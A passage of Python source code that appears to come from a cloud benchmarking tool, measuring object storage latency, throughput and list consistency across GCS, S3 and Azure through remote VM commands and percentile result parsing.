OBJECT_STORAGE_GCS_MULTIREGION = 'object_storage_gcs_multiregion'
GCS_MULTIREGION_LOCATION = 'gcs_multiregion_location'
DEFAULT = 'default'
# This accounts for the overhead of running RemoteCommand() on a VM.
MULTISTREAM_DELAY_PER_VM = 5.0 * units.second
# We wait this long for each stream. Note that this is multiplied by
# the number of streams per VM, not the total number of streams.
MULTISTREAM_DELAY_PER_STREAM = 0.1 * units.second
# And add a constant factor for PKB-side processing
MULTISTREAM_DELAY_CONSTANT = 10.0 * units.second
# The multistream write benchmark writes a file in the VM's /tmp with
# the objects it has written, which is used by the multistream read
# benchmark. This is the filename.
OBJECTS_WRITTEN_FILE = 'pkb-objects-written'
# If the gap between different stream starts and ends is above a
# certain proportion of the total time, we log a warning because we
# are throwing out a lot of information. We also put the warning in
# the sample metadata.
MULTISTREAM_STREAM_GAP_THRESHOLD = 0.2
# The API test script uses different names for providers than this
# script :(
STORAGE_TO_API_SCRIPT_DICT = {
providers.GCP: 'GCS',
providers.AWS: 'S3',
providers.AZURE: 'AZURE'}
_SECONDS_PER_HOUR = 60 * 60
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
# Raised when we fail to remove a bucket or its content after many retries.
# TODO: add a new class of error "ObjectStorageError" to errors.py and remove
# this one.
class BucketRemovalError(Exception):
pass
class NotEnoughResultsError(Exception):
pass
class ColdDataError(Exception):
"""Exception indicating that the cold object data does not exist."""
def _JsonStringToPercentileResults(results, json_input, metric_name,
metric_unit, metadata):
"""This function parses a percentile result string in Json format.
Args:
results: The final result set to put result in.
json_input: The input in Json format about percentiles.
metric_name: Name of the metric.
metric_unit: Unit of the metric.
metadata: The metadata to be included.
"""
result = json.loads(json_input)
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (metric_name, percentile),
float(result[percentile]),
metric_unit,
metadata))
def _GetClientLibVersion(vm, library_name):
"""This function returns the version of client lib installed on a vm.
Args:
vm: the VM to get the client lib version from.
library_name: the name of the client lib.
Returns:
The version string of the client.
"""
version, _ = vm.RemoteCommand('pip show %s |grep Version' % library_name)
logging.info('%s client lib version is: %s', library_name, version)
return version
def MultiThreadStartDelay(num_vms, threads_per_vm):
"""Find how long in the future we can simultaneously start threads on VMs.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
A units.Quantity of time such that if we want to start
threads_per_vm threads on num_vms VMs, we can start the threads
sequentially, tell each of them to sleep for this number of
seconds, and we expect that we will be able to start the last
thread before the delay has finished.
"""
return (
MULTISTREAM_DELAY_CONSTANT +
MULTISTREAM_DELAY_PER_VM * num_vms +
MULTISTREAM_DELAY_PER_STREAM * threads_per_vm)
def _ProcessMultiStreamResults(start_times, latencies, sizes, operation,
all_sizes, results, metadata=None):
"""Read and process results from the api_multistream worker process.
Results will be reported per-object size and combined for all
objects.
Args:
start_times: a list of numpy arrays. Operation start times, as
POSIX timestamps.
latencies: a list of numpy arrays. Operation durations, in seconds.
sizes: a list of numpy arrays. Object sizes used in each
operation, in bytes.
operation: 'upload' or 'download'. The operation the results are from.
all_sizes: a sequence of integers. all object sizes in the
distribution used, in bytes.
results: a list to append Sample objects to.
metadata: dict. Base sample metadata
"""
num_streams = FLAGS.object_storage_streams_per_vm * FLAGS.num_vms
assert len(start_times) == num_streams
assert len(latencies) == num_streams
assert len(sizes) == num_streams
if metadata is None:
metadata = {}
metadata['num_streams'] = num_streams
metadata['objects_per_stream'] = (
FLAGS.object_storage_multistream_objects_per_stream)
metadata['object_naming'] = FLAGS.object_storage_object_naming_scheme
num_records = sum((len(start_time) for start_time in start_times))
logging.info('Processing %s total operation records', num_records)
stop_times = [start_time + latency
for start_time, latency in zip(start_times, latencies)]
last_start_time = max((start_time[0] for start_time in start_times))
first_stop_time = min((stop_time[-1] for stop_time in stop_times))
# Compute how well our synchronization worked
first_start_time = min((start_time[0] for start_time in start_times))
last_stop_time = max((stop_time[-1] for stop_time in stop_times))
start_gap = last_start_time - first_start_time
stop_gap = last_stop_time - first_stop_time
if ((start_gap + stop_gap) / (last_stop_time - first_start_time) <
MULTISTREAM_STREAM_GAP_THRESHOLD):
logging.info(
'First stream started %s seconds before last stream started', start_gap)
logging.info(
'Last stream ended %s seconds after first stream ended', stop_gap)
else:
logging.warning(
'Difference between first and last stream start/end times was %s and '
'%s, which is more than %s of the benchmark time %s.',
start_gap, stop_gap, MULTISTREAM_STREAM_GAP_THRESHOLD,
(last_stop_time - first_start_time))
metadata['stream_gap_above_threshold'] = True
# Find the indexes in each stream where all streams are active,
# following Python's [inclusive, exclusive) index convention.
active_start_indexes = []
for start_time in start_times:
for i in range(len(start_time)):
if start_time[i] >= last_start_time:
active_start_indexes.append(i)
break
active_stop_indexes = []
for stop_time in stop_times:
for i in range(len(stop_time) - 1, -1, -1):
if stop_time[i] <= first_stop_time:
active_stop_indexes.append(i + 1)
break
active_latencies = [
latencies[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
active_sizes = [
sizes[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
all_active_latencies = np.concatenate(active_latencies)
all_active_sizes = np.concatenate(active_sizes)
# Don't publish the full distribution in the metadata because doing
# so might break regexp-based parsers that assume that all metadata
# values are simple Python objects. However, do add an
# 'object_size_B' metadata field even for the full results because
# searching metadata is easier when all records with the same metric
# name have the same set of metadata fields.
distribution_metadata = metadata.copy()
if len(all_sizes) == 1:
distribution_metadata['object_size_B'] = all_sizes[0]
else:
distribution_metadata['object_size_B'] = 'distribution'
latency_prefix = 'Multi-stream %s latency' % operation
logging.info('Processing %s multi-stream %s results for the full '
'distribution.', len(all_active_latencies), operation)
_AppendPercentilesToResults(
results,
all_active_latencies,
latency_prefix,
LATENCY_UNIT,
distribution_metadata)
# Publish by-size and full-distribution stats even if there's only
# one size in the distribution, because it simplifies postprocessing
# of results.
for size in all_sizes:
this_size_metadata = metadata.copy()
this_size_metadata['object_size_B'] = size
logging.info('Processing multi-stream %s results for object size %s',
operation, size)
_AppendPercentilesToResults(
results,
all_active_latencies[all_active_sizes == size],
latency_prefix,
LATENCY_UNIT,
this_size_metadata)
# Record samples for individual downloads and uploads if requested.
if FLAGS.record_individual_latency_samples:
for latency in all_active_latencies[all_active_sizes == size]:
results.append(
sample.Sample('%s individual' % latency_prefix, latency,
LATENCY_UNIT, this_size_metadata))
# Build the object latency histogram if user requested it
if FLAGS.object_storage_latency_histogram_interval:
histogram_interval = FLAGS.object_storage_latency_histogram_interval
hist_latencies = [[l for l, s in zip(*w_l_s) if s == size]
for w_l_s in zip(latencies, sizes)]
max_latency = max([max(l) for l in hist_latencies])
# Note that int() floors for us
num_histogram_buckets = int(max_latency / histogram_interval) + 1
histogram_buckets = [0 for _ in range(num_histogram_buckets)]
for worker_latencies in hist_latencies:
for latency in worker_latencies:
# Note that int() floors for us
histogram_buckets[int(latency / histogram_interval)] += 1
histogram_str = ','.join([str(c) for c in histogram_buckets])
histogram_metadata = this_size_metadata.copy()
histogram_metadata['interval'] = histogram_interval
histogram_metadata['histogram'] = histogram_str
results.append(sample.Sample(
'Multi-stream %s latency histogram' % operation,
0.0, 'histogram', metadata=histogram_metadata))
# Throughput metrics
total_active_times = [np.sum(latency) for latency in active_latencies]
active_durations = [stop_times[i][active_stop_indexes[i] - 1] -
start_times[i][active_start_indexes[i]]
for i in range(num_streams)]
total_active_sizes = [np.sum(size) for size in active_sizes]
# 'net throughput (with gap)' is computed by taking the throughput
# for each stream (total # of bytes transmitted / (stop_time -
# start_time)) and then adding the per-stream throughputs. 'net
# throughput' is the same, but replacing (stop_time - start_time)
# with the sum of all of the operation latencies for that thread, so
# we only divide by the time that stream was actually transmitting.
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput',
np.sum((size / active_time * 8
for size, active_time
in zip(total_active_sizes, total_active_times))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (with gap)',
np.sum((size / duration * 8
for size, duration in zip(total_active_sizes, active_durations))),
'bit / second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' net throughput (simplified)',
sum([np.sum(size) for size in sizes]) /
(last_stop_time - first_start_time) * 8,
'bit / second', metadata=distribution_metadata))
# QPS metrics
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (any stream active)',
num_records / (last_stop_time - first_start_time), 'operation / second',
metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' QPS (all streams active)',
len(all_active_latencies) / (first_stop_time - last_start_time),
'operation / second', metadata=distribution_metadata))
# Statistics about benchmarking overhead
gap_time = sum((active_duration - active_time
for active_duration, active_time
in zip(active_durations, total_active_times)))
results.append(sample.Sample(
'Multi-stream ' + operation + ' total gap time',
gap_time, 'second', metadata=distribution_metadata))
results.append(sample.Sample(
'Multi-stream ' + operation + ' gap time proportion',
gap_time / (first_stop_time - last_start_time) * 100.0,
'percent', metadata=distribution_metadata))
def _DistributionToBackendFormat(dist):
"""Convert an object size distribution to the format needed by the backend.
Args:
dist: a distribution, given as a dictionary mapping size to
frequency. Size will be a string with a quantity and a
unit. Frequency will be a percentage, including a '%'
character. dist may also be a string, in which case it represents
a single object size which applies to 100% of objects.
Returns:
A dictionary giving an object size distribution. Sizes will be
integers representing bytes. Frequencies will be floating-point
numbers in [0,100], representing percentages.
Raises:
ValueError if dist is not a valid distribution.
"""
if isinstance(dist, dict):
val = {flag_util.StringToBytes(size):
flag_util.StringToRawPercent(frequency)
for size, frequency in six.iteritems(dist)}
else:
# We allow compact notation for point distributions. For instance,
# '1KB' is an abbreviation for '{1KB: 100%}'.
val = {flag_util.StringToBytes(dist): 100.0}
# I'm requiring exact addition to 100, which can always be satisfied
# with integer percentages. If we want to allow general decimal
# percentages, all we have to do is replace this equality check with
# approximate equality.
if sum(six.itervalues(val)) != 100.0:
raise ValueError("Frequencies in %s don't add to 100%%!" % dist)
return val
class APIScriptCommandBuilder(object):
"""Builds command lines for the API test script.
Attributes:
test_script_path: the path to the API test script on the remote machine.
storage: the storage provider to use, in the format expected by
the test script.
service: the ObjectStorageService object corresponding to the
storage provider.
"""
def __init__(self, test_script_path, storage, service):
self.test_script_path = test_script_path
self.storage = storage
self.service = service
def BuildCommand(self, args):
"""Build a command string for the API test script.
Args:
args: a list of strings. These will become space-separated
arguments to the test script.
Returns:
A string that can be passed to vm.RemoteCommand.
"""
cmd_parts = [
self.test_script_path,
'--storage_provider=%s' % self.storage
] + args + self.service.APIScriptArgs()
if FLAGS.object_storage_storage_class is not None:
cmd_parts += ['--object_storage_class',
FLAGS.object_storage_storage_class]
return ' '.join(cmd_parts)
class UnsupportedProviderCommandBuilder(APIScriptCommandBuilder):
"""A dummy command builder for unsupported providers.
When a provider isn't supported by the API test script yet, we
create this command builder for them. It will let us run the CLI
benchmark on that provider, but if the user tries to run an API
benchmark, it will throw an error.
Attributes:
provider: the name of the unsupported provider.
"""
def __init__(self, provider):
self.provider = provider
def BuildCommand(self, args):
raise NotImplementedError('API tests are not supported on provider %s.' %
self.provider)
def OneByteRWBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for small object latency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
one_byte_rw_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=OneByteRW'])
_, raw_result = vm.RemoteCommand(one_byte_rw_cmd)
logging.info('OneByteRW raw result is %s', raw_result)
for up_and_down in ['upload', 'download']:
search_string = 'One byte %s - (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = ONE_BYTE_LATENCY % up_and_down
if len(result_string) > 0:
_JsonStringToPercentileResults(results,
result_string[0],
sample_name,
LATENCY_UNIT,
metadata)
else:
raise ValueError('Unexpected test outcome from OneByteRW api test: '
'%s.' % raw_result)
def SingleStreamThroughputBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for large object throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
single_stream_throughput_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--scenario=SingleStreamThroughput'])
_, raw_result = vm.RemoteCommand(single_stream_throughput_cmd)
logging.info('SingleStreamThroughput raw result is %s', raw_result)
for up_and_down in ['upload', 'download']:
search_string = 'Single stream %s throughput in Bps: (.*)' % up_and_down
result_string = re.findall(search_string, raw_result)
sample_name = SINGLE_STREAM_THROUGHPUT % up_and_down
if not result_string:
raise ValueError('Unexpected test outcome from '
'SingleStreamThroughput api test: %s.' % raw_result)
# Convert Bytes per second to Mega bits per second
# We use MB (10^6) to be consistent with network
# bandwidth convention.
result = json.loads(result_string[0])
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (sample_name, percentile),
8 * float(result[percentile]) / 1000 / 1000,
THROUGHPUT_UNIT,
metadata))
def ListConsistencyBenchmark(results, metadata, vm, command_builder,
service, bucket_name):
"""A benchmark for bucket list consistency.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
list_consistency_cmd = command_builder.BuildCommand([
'--bucket=%s' % bucket_name,
'--iterations=%d' % FLAGS.object_storage_list_consistency_iterations,
'--scenario=ListConsistency'])
_, raw_result = vm.RemoteCommand(list_consistency_cmd)
logging.info('ListConsistency raw result is %s', raw_result)
for scenario in LIST_CONSISTENCY_SCENARIOS:
metric_name = '%s %s' % (scenario, LIST_CONSISTENCY_PERCENTAGE)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
if not result_string:
raise ValueError(
'Cannot get percentage from ListConsistency test.')
results.append(sample.Sample(
metric_name,
(float)(result_string[0]),
NA_UNIT,
metadata))
# Parse the list inconsistency window if there is any.
metric_name = '%s %s' % (scenario, LIST_INCONSISTENCY_WINDOW)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
# Also report the list latency. These latencies are from the lists
# that were consistent.
metric_name = '%s %s' % (scenario, LIST_LATENCY)
search_string = '%s: (.*)' % metric_name
result_string = re.findall(search_string, raw_result)
_JsonStringToPercentileResults(results,
result_string[0],
metric_name,
LATENCY_UNIT,
metadata)
def LoadWorkerOutput(output):
"""Load output from worker processes to our internal format.
Args:
output: list of strings. The stdouts of all worker processes.
Returns:
A tuple of start_time, latency, size. Each of these is a list of
numpy arrays, one array per worker process. start_time[i],
latency[i], and size[i] together form a table giving the start
time, latency, and size (bytes transmitted or received) of all
send/receive operations for worker i.
start_time holds POSIX timestamps, stored as np.float64. latency
holds times in seconds, stored as np.float64. size holds sizes in
bytes, stored as np.int64.
Example:
start_time[i] latency[i] size[i]
------------- ---------- -------
0.0 0.5 100
1.0 0.7 200
2.3 0.3 100
Raises:
AssertionError, if an individual worker's input includes
overlapping operations, or operations that don't move forward in
time, or if the input list isn't in stream number order.
"""
start_times = []
latencies = []
sizes = []
for worker_out in output:
json_out = json.loads(worker_out)
for stream in json_out:
assert len(stream['start_times']) == len(stream['latencies'])
assert len(stream['latencies']) == len(stream['sizes'])
start_times.append(np.asarray(stream['start_times'], dtype=np.float64))
latencies.append(np.asarray(stream['latencies'], dtype=np.float64))
sizes.append(np.asarray(stream['sizes'], dtype=np.int64))
return start_times, latencies, sizes
def _RunMultiStreamProcesses(vms, command_builder, cmd_args, streams_per_vm):
"""Runs all of the multistream read or write processes and doesn't return
until they complete.
Args:
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
cmd_args: arguments for the command_builder.
streams_per_vm: number of threads per vm.
"""
output = [None] * len(vms)
def RunOneProcess(vm_idx):
logging.info('Running on VM %s.', vm_idx)
cmd = command_builder.BuildCommand(
cmd_args + ['--stream_num_start=%s' % (vm_idx * streams_per_vm)])
out, _ = vms[vm_idx].RobustRemoteCommand(cmd, should_log=False)
output[vm_idx] = out
# Each vm/process has a thread managing it.
threads = [
threading.Thread(target=RunOneProcess, args=(vm_idx,))
for vm_idx in range(len(vms))]
for thread in threads:
thread.start()
logging.info('Started %s processes.', len(vms))
# Wait for the threads to finish
for thread in threads:
thread.join()
logging.info('All processes complete.')
return output
def _DatetimeNow():
"""Returns datetime.datetime.now()."""
return datetime.datetime.now()
def _ColdObjectsWrittenFilename():
"""Generates a name for the objects_written_file.
Returns:
The name of the objects_written_file if it should be created, or None.
"""
if FLAGS.object_storage_objects_written_file_prefix:
# Note this format is required by _ColdObjectsWrittenFileAgeHours.
datetime_suffix = _DatetimeNow().strftime('%Y%m%d-%H%M')
return '%s-%s-%s-%s' % (
FLAGS.object_storage_objects_written_file_prefix,
FLAGS.object_storage_region,
uuid.uuid4(), # Add a UUID to support parallel runs that upload data.
datetime_suffix)
return None
def _ColdObjectsWrittenFileAgeHours(filename):
"""Determines the age in hours of an objects_written_file.
Args:
filename: The name of the file.
Returns:
The age of the file in hours (based on the name), or None.
"""
# Parse the year, month, day, hour, and minute from the filename based on the
# way it is written in _ColdObjectsWrittenFilename.
match = re.search(r'(\d\d\d\d)(\d\d)(\d\d)-(\d\d)(\d\d)$', filename)
if not match:
return None
year, month, day, hour, minute = (int(item) for item in match.groups())
write_datetime = datetime.datetime(year, month, day, hour, minute)
write_timedelta = _DatetimeNow() - write_datetime
return write_timedelta.total_seconds() / _SECONDS_PER_HOUR
def _MultiStreamOneWay(results, metadata, vms, command_builder,
service, bucket_name, operation):
"""Measures multi-stream latency and throughput in one direction.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
operation: 'upload' or 'download'
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
size_distribution = _DistributionToBackendFormat(
FLAGS.object_storage_object_sizes)
logging.info('Distribution %s, backend format %s.',
FLAGS.object_storage_object_sizes, size_distribution)
streams_per_vm = FLAGS.object_storage_streams_per_vm
start_time = (
time.time() +
MultiThreadStartDelay(FLAGS.num_vms, streams_per_vm).m_as('second'))
logging.info('Start time is %s', start_time)
cmd_args = [
'--bucket=%s' % bucket_name,
'--objects_per_stream=%s' % (
FLAGS.object_storage_multistream_objects_per_stream),
'--num_streams=%s' % streams_per_vm,
'--start_time=%s' % start_time,
'--objects_written_file=%s' % objects_written_file]
if operation == 'upload':
cmd_args += [
'--object_sizes="%s"' % size_distribution,
'--object_naming_scheme=%s' % FLAGS.object_storage_object_naming_scheme,
'--scenario=MultiStreamWrite']
elif operation == 'download':
cmd_args += ['--scenario=MultiStreamRead']
else:
raise Exception('Value of operation must be \'upload\' or \'download\'.'
'Value is: \'' + operation + '\'')
output = _RunMultiStreamProcesses(vms, command_builder, cmd_args,
streams_per_vm)
start_times, latencies, sizes = LoadWorkerOutput(output)
if FLAGS.object_storage_worker_output:
with open(FLAGS.object_storage_worker_output, 'w') as out_file:
out_file.write(json.dumps(output))
_ProcessMultiStreamResults(start_times, latencies, sizes, operation,
list(six.iterkeys(size_distribution)), results,
metadata=metadata)
# Write the objects written file if the flag is set and this is an upload
objects_written_path_local = _ColdObjectsWrittenFilename()
if operation == 'upload' and objects_written_path_local is not None:
# Get the objects written from all the VMs
# Note these are JSON lists with the following format:
# [[object1_name, object1_size],[object2_name, object2_size],...]
outs = vm_util.RunThreaded(
lambda vm: vm.RemoteCommand('cat ' + objects_written_file), vms)
maybe_storage_account = ''
maybe_resource_group = ''
if FLAGS.storage == 'Azure':
maybe_storage_account = '"azure_storage_account": "%s", ' % \
service.storage_account.name
maybe_resource_group = '"azure_resource_group": "%s", ' % \
service.resource_group.name
# Merge the objects written from all the VMs into a single string
objects_written_json = \
'{%s%s"bucket_name": "%s", "objects_written": %s}' % \
(maybe_storage_account, maybe_resource_group, bucket_name,
'[' + ','.join([out for out, _ in outs]) + ']')
# Write the file
with open(objects_written_path_local, 'w') as objects_written_file_local:
objects_written_file_local.write(objects_written_json)
def MultiStreamRWBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream read/write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, 'upload')
logging.info('Finished multi-stream write test. Starting '
'multi-stream read test.')
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, 'download')
logging.info('Finished multi-stream read test.')
def MultiStreamWriteBenchmark(results, metadata, vms, command_builder,
service, bucket_name):
"""A benchmark for multi-stream write latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream write test on %s VMs.', len(vms))
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, 'upload')
logging.info('Finished multi-stream write test.')
def MultiStreamReadBenchmark(results, metadata, vms, command_builder,
service, bucket_name, read_objects):
"""A benchmark for multi-stream read latency and throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vms: the VMs to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: The provider's ObjectStorageService
bucket_name: the primary bucket to benchmark.
read_objects: List of lists of [object_name, object_size]. In the outermost
list, each element corresponds to a VM's worker process.
Raises:
ValueError if an unexpected test outcome is found from the API
test script.
"""
logging.info('Starting multi-stream read test on %s VMs.', len(vms))
assert read_objects is not None, (
'api_multistream_reads scenario requires the '
'object_storage_read_objects_prefix flag to be set.')
# Send over the objects written file
try:
# Write the per-VM objects-written-files
assert len(read_objects) == len(vms), (
'object_storage_read_objects_prefix file specified requires exactly '
'%d VMs, but %d were provisioned.' % (len(read_objects), len(vms)))
for vm, vm_objects_written in zip(vms, read_objects):
# Note that each file is written with a unique name so that parallel runs
# don't overwrite the same local file. They are pushed to the VM to a file
# named OBJECTS_WRITTEN_FILE.
tmp_objects_written_path = os.path.join(vm_util.GetTempDir(),
'%s-%s' % (OBJECTS_WRITTEN_FILE,
vm.name))
with open(tmp_objects_written_path, 'w') as objects_written_file:
objects_written_file.write(json.dumps(vm_objects_written))
vm.PushFile(tmp_objects_written_path,
posixpath.join(vm_util.VM_TMP_DIR, OBJECTS_WRITTEN_FILE))
except Exception as e:
raise Exception('Failed to upload the objects written files to the VMs: '
'%s' % e)
_MultiStreamOneWay(results, metadata, vms, command_builder, service,
bucket_name, 'download')
logging.info('Finished multi-stream read test.')
def CheckPrerequisites(benchmark_config):
"""Verifies that the required resources are present.
Args:
benchmark_config: Benchmark config to verify.
Raises:
perfkitbenchmarker.data.ResourceNotFound: On missing resource.
perfkitbenchmarker.errors.Setup.InvalidFlagConfigurationError: On invalid
flags.
"""
del benchmark_config
data.ResourcePath(DATA_FILE)
if FLAGS.object_storage_apply_region_suffix_to_bucket_name:
if not FLAGS.object_storage_region:
raise errors.Setup.InvalidFlagConfigurationError(
'Please specify --object_storage_region if using '
'--object_storage_apply_region_suffix_to_bucket_name.')
def _AppendPercentilesToResults(output_results, input_results, metric_name,
metric_unit, metadata):
# PercentileCalculator will (correctly) raise an exception on empty
# input, but an empty input list makes semantic sense here.
if len(input_results) == 0:
return
percentiles = PercentileCalculator(input_results)
for percentile in PERCENTILES_LIST:
output_results.append(sample.Sample(('%s %s') % (metric_name, percentile),
percentiles[percentile],
metric_unit,
metadata))
def CLIThroughputBenchmark(output_results, metadata, vm, command_builder,
service, bucket):
"""A benchmark for CLI tool throughput.
We will upload and download a set of files from/to a local directory
via cli tools and observe the throughput.
Args:
results: the results array to append to.
metadata: a dictionary of metadata to add to samples.
vm: the VM to run the benchmark on.
command_builder: an APIScriptCommandBuilder.
service: an ObjectStorageService.
bucket_name: the primary bucket to benchmark.
Raises:
NotEnoughResultsError: if we failed too many times to upload or download.
"""
data_directory = '/tmp/run/data'
# The real solution to the iteration count issue is dynamically
# choosing the number of iterations based on how long they
# take. This will work for now, though.
if FLAGS.storage == providers.AZURE:
iteration_count = CLI_TEST_ITERATION_COUNT_AZURE
elif FLAGS.cli_test_size == 'normal':
iteration_count = CLI_TEST_ITERATION_COUNT
else:
iteration_count = LARGE_CLI_TEST_ITERATION_COUNT
# The CLI-based tests require some provisioning on the VM first.
vm.RemoteCommand(
'cd /tmp/run/; bash cloud-storage-workload.sh %s' % FLAGS.cli_test_size)
# CLI tool based tests.
cli_upload_results = []
cli_download_results = []
if FLAGS.cli_test_size == 'normal':
data_size_in_mbits = DATA_SIZE_IN_MBITS
file_names = ['file-%s.dat' % i for i in range(100)]
else:
data_size_in_mbits = LARGE_DATA_SIZE_IN_MBITS
file_names = ['file_large_3gib.dat']
for _ in range(iteration_count):
try:
service.EmptyBucket(bucket)
except Exception:
pass
try:
_, res = service.CLIUploadDirectory(vm, data_directory,
file_names, bucket)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to upload, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli upload throughput %f', throughput)
cli_upload_results.append(throughput)
try:
vm.RemoveFile(posixpath.join(DOWNLOAD_DIRECTORY, '*'))
except Exception:
pass
try:
_, res = service.CLIDownloadBucket(vm, bucket,
file_names, DOWNLOAD_DIRECTORY)
except errors.VirtualMachine.RemoteCommandError:
logging.info('failed to download, skip this iteration.')
continue
throughput = data_size_in_mbits / vm_util.ParseTimeCommandResult(res)
logging.info('cli download throughput %f', throughput)
cli_download_results.append(throughput)
expected_successes = iteration_count * (1 - CLI_TEST_FAILURE_TOLERANCE)
if (len(cli_download_results) < expected_successes or
len(cli_upload_results) < expected_successes):
raise NotEnoughResultsError('Failed to complete the required number of '
'iterations.')
# Report various percentiles.
metrics_prefix = ''
if FLAGS.cli_test_size != 'normal':
metrics_prefix = '%s ' % FLAGS.cli_test_size
_AppendPercentilesToResults(output_results,
cli_upload_results,
'%s%s' % (metrics_prefix,
UPLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
_AppendPercentilesToResults(output_results,
cli_download_results,
'%s%s' % (metrics_prefix,
DOWNLOAD_THROUGHPUT_VIA_CLI),
THROUGHPUT_UNIT,
metadata)
def PrepareVM(vm, service):
vm.Install('pip')
vm.RemoteCommand('sudo pip install absl-py')
vm.RemoteCommand('sudo pip install pyyaml')
vm.Install('openssl')
# Prepare data on vm, create a run directory in temporary directory, and add
# permission.
vm.RemoteCommand('sudo mkdir -p ' + SCRIPT_DIR)
vm.RemoteCommand('sudo chmod 777 ' + SCRIPT_DIR)
vm.RemoteCommand('sudo mkdir -p ' + DOWNLOAD_DIRECTORY)
vm.RemoteCommand('sudo chmod 777 ' + DOWNLOAD_DIRECTORY)
remote_package_dir = posixpath.join(SCRIPT_DIR, 'providers')
vm.RemoteCommand('sudo mkdir -p ' + remote_package_dir)
vm.RemoteCommand('sudo chmod 777 ' + remote_package_dir)
file_path = data.ResourcePath(DATA_FILE)
vm.PushFile(file_path, SCRIPT_DIR)
# push the test script
script_path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, API_TEST_SCRIPT))
vm.PushFile(script_path, '/tmp/run/')
# push the package dependencies of the test script
for file_name in API_TEST_SCRIPT_PACKAGE_FILES + service.APIScriptFiles():
path = data.ResourcePath(
os.path.join(API_TEST_SCRIPTS_DIR, file_name))
logging.info('Uploading %s to %s', path, vm)
vm.PushFile(path, remote_package_dir)
service.PrepareVM(vm)
def CleanupVM(vm, service):
service.CleanupVM(vm)
vm.RemoteCommand('/usr/bin/yes | sudo pip uninstall absl-py')
vm.RemoteCommand('sudo rm -rf /tmp/run/')
objects_written_file = posixpath.join(vm_util.VM_TMP_DIR,
OBJECTS_WRITTEN_FILE)
vm.RemoteCommand('rm -f %s' % objects_written_file)
def Prepare(benchmark_spec):
"""Prepare vm with cloud provider tool and prepare vm with data file.
Args:
benchmark_spec: The benchmark specification. Contains all data that is
required to run the benchmark.
Raises:
ColdDataError: If this benchmark is reading cold data, but the data isn't
cold enough (as configured by object_storage_read_objects_min_hours).
"""
# We would like to always cleanup server side states when exception happens.
benchmark_spec.always_call_cleanup = True
# Load the objects to read file if specified
benchmark_spec.read_objects = None
if FLAGS.object_storage_read_objects_prefix is not None:
# By taking a glob, we choose an arbitrary file that is old enough, assuming
# there is ever more than one.
search_prefix = '%s-%s*' % (
FLAGS.object_storage_read_objects_prefix,
FLAGS.object_storage_region)
read_objects_filenames = glob.glob(search_prefix)
logging.info('Considering object files %s*: %s', search_prefix,
read_objects_filenames)
for filename in read_objects_filenames:
age_hours = _ColdObjectsWrittenFileAgeHours(filename)
